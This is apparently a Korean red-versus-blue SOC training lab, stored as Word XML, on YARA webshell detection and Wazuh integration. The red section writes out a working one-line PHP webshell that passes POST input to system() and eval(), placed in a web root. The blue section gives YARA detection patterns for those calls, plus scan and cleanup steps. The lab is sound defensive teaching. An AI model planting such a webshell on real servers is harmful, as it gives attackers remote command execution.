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W4] YARA 악성코드 탐지 — 웹쉘·페이로드 투입 vs 시그니처 헌팅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4주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>YARA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. YARA 는 파일/메모리에서 악성코드를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>문자열·바이트 패턴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>으로 잡는</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">시그니처 언어다. 이번 공방전에서 공격자는 대상 웹서버에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>웹쉘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맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>악성 페이로드 파일</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>을 떨구고,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">관제팀(너)은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>YARA 룰을 작성해 `/var/www` 를 스캔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>하고 Wazuh 와 연동해 자동 탐지를 만든다.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업로드 취약점을 통해 PHP 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa04shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 와 패킹된 악성 페이로드</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.sa04mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 심는다. 관제팀은 ① 웹쉘 YARA 룰을 작성하고, ② Wazuh+YARA 자동 탐지를 연동하고,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">③ 실제로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 스캔해 웹쉘을 찾아 제거하고, ④ IOC→YARA 파이프라인과 엔트로피 기반 패커 탐지를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>설계하고, ⑤ 종합 보고·룰 품질 평가로 마무리한다.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공격(자기 인프라 표적) + 관제를 한 학생이.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외부 공격, Blue 는 자기 인프라에서 YARA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웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/www/html/.sa04shell.php`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(내부 마커 문자열 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa04webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), 악성 페이로드 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.sa04mal`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YARA 룰 파일 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/ossec/etc/yara/soc-adv-w04.yar`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(룰명 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SOCADV_W04_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), Wazuh 연동룰 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 102041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[웹쉘 투입] — PHP 웹쉘로 원격 실행 발판 심기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웹쉘은 가장 흔한 침투 후 발판이다. 너는 대상 웹서버에 PHP 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/var/www/html/.sa04shell.php`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">떨군다. 귀속을 위해 파일 안에 마커 문자열 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`sa04webshell`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 넣는다. 관제팀의 YARA 룰이 이걸 잡아야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(업로드 취약점 또는 발판 후)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cat &gt; /var/www/html/.sa04shell.php &lt;&lt;'PHP'</w:t>
        <w:br/>
        <w:t>&lt;?php /* sa04webshell */ if(isset($_POST['c'])){ system($_POST['c']); } eval($_POST['x'] ?? ''); ?&gt;</w:t>
        <w:br/>
        <w:t>PHP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웹서버에 웹쉘 파일 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa04shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 있는지(+ 내부 마커 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa04webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>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/var/www/html/.sa04shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 존재하고 마커 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa04webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 포함한다.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[악성 페이로드 드롭] — 패킹된 악성 파일 심기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웹쉘 외에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>악성 바이너리/페이로드 파일</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">도 떨군다. 너는 알려진 악성 시그니처(마커 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa04mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)를 가진</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">페이로드 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.sa04mal`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 심는다. 관제팀의 YARA 시그니처/엔트로피 룰이 이걸 잡아야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'sa04mal MALICIOUS-DROPPER eval base64_decode CryptEncrypt' &gt; /tmp/.sa04mal</w:t>
        <w:br/>
        <w:t>chmod +x /tmp/.sa04mal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/tmp/.sa04mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이 있고 마커 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa04mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 포함하는지로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/tmp/.sa04mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이 존재하고 마커 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sa04mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 포함한다.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[웹쉘 YARA 룰] — eval/system/base64 패턴 시그니처 (SOCADV_W04)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RED-1 의 웹쉘을 잡는 YARA 룰을 작성한다. 웹쉘 공통 패턴(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>eval($_POST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system(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base64_decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)과</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>이번 주 마커를 strings 로 잡는다.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/var/ossec/etc/yara/soc-adv-w04.yar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 에 작성한다(디렉토리 없으면 생성).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sudo mkdir -p /var/ossec/etc/yara</w:t>
        <w:br/>
        <w:t>sudo tee /var/ossec/etc/yara/soc-adv-w04.yar &gt;/dev/null &lt;&lt;'YAR'</w:t>
        <w:br/>
        <w:t>rule SOCADV_W04_php_webshell {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  meta:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    description = "SOCADV-W04 PHP webshell detection"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    author = "soc-adv"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  strings:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    $eval = "eval($_POST" nocase</w:t>
        <w:br/>
        <w:t xml:space="preserve">    $sys  = "system(" nocase</w:t>
        <w:br/>
        <w:t xml:space="preserve">    $b64  = "base64_decode(" nocase</w:t>
        <w:br/>
        <w:t xml:space="preserve">    $tag  = "sa04webshell"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  condition:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    $tag or 2 of ($eval, $sys, $b64)</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>YAR</w:t>
        <w:br/>
        <w:t>yara /var/ossec/etc/yara/soc-adv-w04.yar /var/www/html/.sa04shell.php   # 룰 검증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/var/ossec/etc/yara/soc-adv-w04.yar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 에 룰명 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SOCADV_W04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가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YARA 룰 파일에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SOCADV_W04_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 웹쉘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[Wazuh+YARA 연동] — 매칭 자동 고위험 격상 (id 102041)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YARA 매칭을 분석가가 일일이 돌릴 수는 없다. Wazuh 와 연동해 **파일 변경(FIM) 시 YARA 스캔 → 매칭 시</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>자동 고위험 경보</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>가 되게 한다. 매칭 결과를 격상하는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 102041**, level 13)을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 에 추가 후 재시작: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name="edu,malware,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="102041" level="13"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;YARA&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;SOCADV-W04 - YARA malware match detected, escalate&lt;/description&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
        <w:br/>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(개념: syscheck FIM 이벤트 → active-response 로 YARA 스캔 → 매칭 로그가 위 룰로 격상.)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102041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YARA 매칭을 격상하는 id 102041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[웹쉘 헌팅·제거] — /var/www YARA 스캔으로 식별 후 제거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이론이 아니라 실제 탐지다. BLUE-1 의 YARA 룰로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 스캔해 RED-1 의 웹쉘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa04shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 찾아 격리·제거한다.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yara -r /var/ossec/etc/yara/soc-adv-w04.yar /var/www 2&gt;/dev/null   # 재귀 스캔</w:t>
        <w:br/>
        <w:t>find /var/www -name '.*.php' -mmin -120 2&gt;/dev/null                      # 최근 숨김 PHP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>식별 후 보고서에 "발견 → 격리 → 제거 → 복구" 단계로 적는다(실제 제거는 파일 삭제).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웹서버에서 웹쉘 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/.sa04shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 헌팅되는지로 채점(발견이 핵심).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/var/www/html/.sa04shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 스캔으로 식별한다(식별 후 제거 보고).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[IOC→YARA 파이프라인] — 엔트로피·패커 탐지 + 자동 갱신 설계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성숙한 악성코드 탐지는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>위협 인텔의 IOC 를 YARA 로 자동 변환</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">하고, 패킹된 미지 악성코드는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>엔트로피</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>잡는다. IOC(해시/문자열)→YARA 파이프라인과 엔트로피 기반 패커 탐지 룰을 설계한다.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IOC→YARA: TI 피드의 해시/문자열을 YARA strings 로 변환하는 절차 + 자동 갱신(cron) 방안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엔트로피 룰(개념): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import math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/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>math.entropy(0, filesize) &gt; 7.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 로 패킹/암호화 섹션 탐지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RED-2 의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.sa04mal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 같은 미지 페이로드를 어떻게 잡을지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IOC→YARA 파이프라인/엔트로피 설계로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IOC→YARA 파이프라인·엔트로피 패커 탐지 설계는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 보고·Cleanup] — 탐지 범위 + 룰 품질 평가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YARA 탐지 체계의 산출물이다. 룰셋 목록, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>탐지 범위</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(웹쉘/패커/랜섬웨어 등 유형별), Wazuh 연동 상태,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>룰 품질 평가</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(커버리지/오탐률/성능), 운영 절차를 종합하고,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탐지 범위 표 + 룰 품질 평가(커버리지·FP율·스캔 성능)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/var/www/html/.sa04shell.php /tmp/.sa04mal /var/ossec/etc/yara/soc-adv-w04.yar</w:t>
        <w:br/>
        <w:t># local_rules.xml 에서 102041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탐지 범위/품질 평가/회고/cleanup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탐지 범위·룰 품질 평가·회고·cleanup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